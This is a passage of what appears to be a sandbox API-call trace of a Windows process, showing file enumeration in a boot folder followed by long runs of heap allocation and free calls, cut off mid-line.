[0209.768] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.768] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.768] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.768] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.768] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.768] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.769] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.769] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.769] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.770] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.770] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.771] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.771] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.772] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.772] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.773] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.773] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.774] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.774] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.775] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.775] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.776] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.776] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.778] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.778] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 